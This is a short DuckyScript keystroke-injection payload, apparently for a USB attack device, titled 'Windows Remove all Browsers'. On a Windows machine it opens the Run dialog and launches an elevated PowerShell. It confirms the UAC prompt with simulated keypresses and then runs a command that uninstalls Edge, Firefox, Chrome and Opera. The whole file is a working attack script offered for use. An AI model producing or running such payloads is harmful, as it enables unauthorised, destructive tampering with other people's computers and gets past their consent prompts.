REM ###########################################################
REM #                                                         |
REM # Title        : Windows Remove all Browsers              |
REM # Author       : Zenin                                    |
REM # Version      : 1.0                                      |
REM # Category     : Execution                                |
REM # Target       : Windows                                  |
REM #                                                         |
REM ###########################################################
DELAY 800
WINDOWS d
DELAY 800
WINDOWS r
DELAY 800
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 800
LEFTARROW
ENTER
DELAY 800
STRING Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Where-Object {($_.DisplayName -like "Microsoft Edge") -or ($_.DisplayName -like "Mozilla Firefox") -or ($_.DisplayName -like "Google Chrome") -or ($_.DisplayName -like "Opera*")} | ForEach-Object {Uninstall-package $_.PSChildName -Verbose}
DELAY 200
ENTER
DELAY 1200
STRING exit
ENTER